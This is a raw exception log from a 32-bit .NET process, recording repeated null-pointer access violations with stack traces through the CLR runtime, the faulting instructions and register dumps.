CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843d866
0x843d2b8
0x8438b75
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 47132356
1 0 0

__exception__

stacktrace:
0x843d3e5
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843d866
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 48483656
1 0 0

__exception__

stacktrace:
0x843d3e5
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335468
registers.edi: 3335716
registers.eax: 0
registers.ebp: 3335728
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843d866
0x843d2b8
0x8438b8d
0x84379f2
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335704
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335712
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 49834956
1 0 0

__exception__

stacktrace:
0x843db34
0x843d9e8
0x8438b75
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843de0a
0x843d9e8
0x8438b75
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43907004
registers.ecx: 44794484
1 0 0

__exception__

stacktrace:
0x843db34
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843de0a
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 46289140
1 0 0

__exception__

stacktrace:
0x843db34
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335532
registers.edi: 3335780
registers.eax: 0
registers.ebp: 3335792
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843de0a
0x843d9e8
0x8438b8d
0x8437af4
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335768
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335776
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 47783796
1 0 0

__exception__

stacktrace:
0x843e17d
0x843e058
0x8438b75
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843e432
0x843e058
0x8438b75
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x843cff3
registers.esp: 3335788
registers.edi: 3336044
registers.eax: 0
registers.ebp: 3335796
registers.edx: 0
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 44574020
1 0 0

__exception__

stacktrace:
0x843e17d
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
0x8f2ea3
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x725d2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725e264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725e2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726974ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72697610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72721dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72721e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72721f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7272416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72df7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72df4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 a4 46 e0 04 89 85 3c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x8439684
registers.esp: 3335552
registers.edi: 3335800
registers.eax: 0
registers.ebp: 3335812
registers.edx: 81806644
registers.ebx: 3338428
registers.esi: 43883804
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x843cfb0
0x843e432
0x843e058
0x8438b8d
0x8437be1
0x843653e
0x8fc7af
0x8f6d75
0x8f6886
0x8f34ab
0x8f2f10
